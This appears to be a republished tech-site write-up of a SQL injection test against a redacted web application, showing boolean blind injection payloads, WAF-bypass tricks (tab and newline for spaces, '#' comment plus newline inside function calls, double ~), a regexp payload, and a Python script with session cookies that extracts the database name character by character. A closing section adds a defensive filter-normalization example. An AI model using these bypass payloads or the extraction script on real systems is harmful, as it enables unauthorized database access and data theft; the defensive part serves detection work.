2025-02-23 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
This article walks through a case study of bypassing an interception filter during SQL injection testing. The content is quite detailed; interested readers can use it for reference, and I hope it is helpful to you.
1. A Boolean injection point was found during the test. The test process was as follows:
   1. Send the original request.
   2. Enter 'or'1'like'1
   3. Enter 'or'1'like'2
   4. This initially confirms a Boolean-based blind SQL injection; next, start determining the length of the database name.
   5. First, consider that spaces may be filtered, and do a simple manual test.
   6. Findings:
      a space before or (not intercepted)
      or followed by a space (intercepted)
      or/**/ (intercepted)
      or followed by %09, %0a or %0d (not intercepted)
2. Simple fuzzing of the characters after or:
   1. or followed by an even number of ~ also bypasses the filter (a double bitwise NOT leaves the operand's value unchanged).
   2. With an odd number of ~ the query fails to execute.
   3. Obtain the length of the database name:
   4. The request is intercepted, so guess whether the length() or database() function is being filtered, and simply try each one:
   5. length() is filtered; fuzz it:
   6. A comment-plus-newline combination such as length%23%0a() bypasses the filter:
   7. An error is still reported here. After a quick test, replacing the space solves the problem:
   8. Continue determining the length of the database name:
   9. database() is also filtered, and the same method bypasses it:
   10. Finally, the database name is 7 characters long, as shown below:
   11. Get the database name.
   12. substr is not intercepted. Run the test with Burp Intruder:
   Note that the first character is l.
   Write a script to pull out the full database name:
```python
# Ported from the write-up's Python 2 script to Python 3 (print() and resp.text).
# Host, cookies and IDs are the write-up's own redacted placeholders (xxxx).
import requests

payloads = 'abcdefghijklmnopqrstuvwxyz_-'
database = ''

for i in range(1, 8):                        # the name was found to be 7 characters long
    for payload in payloads:
        # Boolean oracle: substr(database#\n(), i, 1) = '<payload>', with %09 (tab) in place of spaces
        burp0_url = (
            "https://xxxxxx.xxxxxxxx.com:443/dms.web/manage/rest/basedata/DutyRecord"
            "?sort=EMPLOYEE_NO&order=asc&limit=10&offset=0"
            "&registerDate=2020-08-19'or%09substr(database%23%0a(),{0},1)%3d'{1}'%09or'1'like'2"
            "&employeeNo=0222&onDutyTime=08%3A00&offDutyTime=17%3A00&usableWorkingHours=9.0"
            "&dms_table=%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D"
            "&dmsFuncId=15100070&_=1597802235462"
        ).format(i, payload)
        burp0_cookies = {
            "JSESSIONID": "ABCWB37FFE3DB54BD5705453E681E41F2",
            "selectDealerCode": "xxxx",
            "selectusername": "xxxx",
            "language": "zh_CN",
        }
        burp0_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:79.0) Gecko/20100101 Firefox/79.0",
            "Accept": "application/json, text/javascript, */*; q=0.01",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/json",
            "X-Requested-With": "XMLHttpRequest",
            "Connection": "close",
            "Referer": "https://xxxxxx.yxxxxuxuxo.xxm/dms.web/html/index.html",
        }
        resp = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
        if "2018-10-22" in resp.text:       # true branch: the record dated 2018-10-22 is returned
            database += payload
            print('[*] success\t' + database)
            break                            # character found, move on to the next position
        else:
            print('[*] dumping.')

print('[*] current database is:\t' + database)
```
   Regular-expression matching with regexp achieves the same thing. Payload:
   '%20or%0adatabase%23%0a()regexp'%5el'%09or%09'2'like'1
   This successfully confirms the first character, l; the remaining characters follow in the same way.
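From the defender's side, the three tricks above (a tab instead of a space, a '#' comment plus newline inside a function call, and a double ~) all work because the filter matched the raw parameter instead of a canonical form. The following is an added example, not part of the original write-up, that reconstructs that behaviour: the naive rule is an assumption about what the filter was doing, the sample parameter values are constructed from the payload shapes shown above, and normalize() shows the canonicalization step that closes the gap.

```python
import re
from urllib.parse import unquote

# Constructed sample values for the registerDate parameter. The first three
# reuse the payload shapes from the write-up (tab for space, '#'+newline inside
# a function call, a double ~); the last is a normal date.
SAMPLES = {
    "tab_space": "2020-08-19'or%09substr(database%23%0a(),1,1)%3d'l'%09or'1'like'2",
    "regexp":    "2020-08-19'%20or%0adatabase%23%0a()regexp'%5el'%09or%09'2'like'1",
    "tilde":     "2020-08-19'or~~'1'like'1",
    "benign":    "2020-08-19",
}

# Assumed reconstruction of the rule the write-up's filter appears to apply:
# "or" followed by a literal space, or length( / database( written contiguously.
NAIVE = re.compile(r"\bor |\b(?:length|database)\(", re.I)

# Rule applied after canonicalization; \s*\( tolerates the whitespace left by a removed comment.
CANON = re.compile(r"\bor\b|\b(?:length|database|substr)\s*\(", re.I)


def normalize(value: str) -> str:
    """Canonicalize a parameter value before signature matching."""
    s = unquote(value)                            # %09 -> tab, %23 -> '#', %0a -> newline
    s = re.sub(r"#[^\n]*\n", " ", s)              # MySQL '#' comment runs to end of line
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)  # inline /**/ comments
    s = re.sub(r"\s+", " ", s)                    # tab, newline, CR all become one space
    s = re.sub(r"(?:~~)+", "", s)                 # an even run of ~ leaves the value unchanged
    return s.strip().lower()


def naive_blocks(value: str) -> bool:
    """Decode but do not canonicalize: this is the behaviour the write-up bypassed."""
    return NAIVE.search(unquote(value)) is not None


def canonical_blocks(value: str) -> bool:
    """Canonicalize first, then match the same kind of signature."""
    return CANON.search(normalize(value)) is not None


if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(f"{name:10} naive={naive_blocks(value)!s:5} canonical={canonical_blocks(value)}")
```

A production filter would tokenize the value as SQL rather than pattern-match it, but the canonicalize-before-match step is exactly what the filter in this case study was missing.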
This concludes the case study on bypassing an interception filter for SQL injection. I hope the content above is helpful and that you learned something new. If you think the article is good, please share it so more people can see it.